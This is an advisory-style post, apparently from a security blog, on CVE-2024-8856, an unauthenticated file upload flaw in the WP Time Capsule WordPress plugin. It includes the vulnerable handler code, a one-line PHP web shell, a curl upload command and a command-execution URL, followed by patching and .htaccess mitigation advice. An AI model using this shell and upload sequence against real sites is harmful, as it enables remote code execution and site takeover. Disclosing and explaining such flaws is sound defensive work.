Discovered: Early 2024
Affected Plugin: WP Time Capsule – Backup and Staging
Plugin Slug: wp-time-capsule
Vulnerable Versions: 1.22.21 and below
Severity: Critical (Unauthenticated Remote Code Execution Possible)
What Is CVE-2024-8856?
CVE-2024-8856 is a serious security flaw in the WordPress plugin WP Time Capsule (WPTC), a widely used backup and staging plugin with over 30,000 installations. The vulnerability is an arbitrary file upload issue, which means anyone (even without logging in) can send any file to a WordPress site running the vulnerable plugin, and the server won't stop them.
This happens because the file upload handler, located in UploadHandler.php, does not properly check the type of the file uploaded, and the plugin fails to restrict direct access to any uploaded file. Because of this weak point, attackers can upload malicious files, such as backdoors or web shells, and execute any code on the target website.
No direct access control – attacker can call and run their files immediately.
Combined, this flaw can lead to a complete site takeover and potential hosting account compromise. In cyber security, arbitrary file upload bugs almost always mean remote code execution (RCE), one of the most critical threats.
Here's a simplified version of the vulnerable code in UploadHandler.php
// (from wp-time-capsule/libs/UploadHandler.php)
if (!empty($_FILES['file'])) {
$file = $_FILES['file'];
// No filetype validation!
$target = WPTC_PLUGIN_DIR . '/uploads/' . basename($file['name']);
move_uploaded_file($file['tmp_name'], $target);
echo json_encode(['status' => 'success']);
} else {
echo json_encode(['status' => 'error']);
}
There is no authentication or nonce verification.
What this means:
An attacker can POST a file (like evil.php) to this handler, and then access it at https://victim.site/wp-content/plugins/wp-time-capsule/uploads/evil.php and run arbitrary PHP code.
1. Send a Malicious File
Attackers can upload a file containing PHP code, such as a web shell or a simple phpinfo() page.
Here's a basic web shell to upload
// shell.php
<?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
Attackers can use curl or a utility like Burp Suite or Postman to send the file
curl -F "file=@shell.php" https://victim.site/wp-content/plugins/wp-time-capsule/libs/UploadHandler.php
After uploading, visit
https://victim.site/wp-content/plugins/wp-time-capsule/uploads/shell.php?cmd=ls
This would run the ls command on the victim server, listing files.
Note: Some hosting environments may have different directory permissions or .htaccess rules, but as packaged, WP Time Capsule's /uploads/ is web-accessible unless the admin took steps to block access.
Update Immediately:
As of writing, WP Time Capsule team has released version 1.22.22 or above, which patches this hole.
👉 Get the latest WP Time Capsule from WordPress.org
2. Remove/disable the plugin if you can't update right away.
`
wp-content/plugins/wp-time-capsule/uploads/
`
# .htaccess in uploads/ directory
Deny from all
References & Credits
- Wordfence Report on CVE-2024-8856
- WPScan Advisory
- Official plugin changelog
- Exploit Proof-of-Concept on GitHub
Bottom Line
CVE-2024-8856 is a textbook case of why strict file validation and upload directory controls are essential for every plugin, especially those managing site backups or staging.
If you run WP Time Capsule:
Stay safe – never trust unchecked uploads!
Do you think your site was hit by this or need more help?
Feel free to ask for free guidance or discuss in the WordPress Support Forums.
Timeline
Published on: 11/16/2024 05:15:13 UTC
Last modified on: 11/21/2024 16:15:27 UTC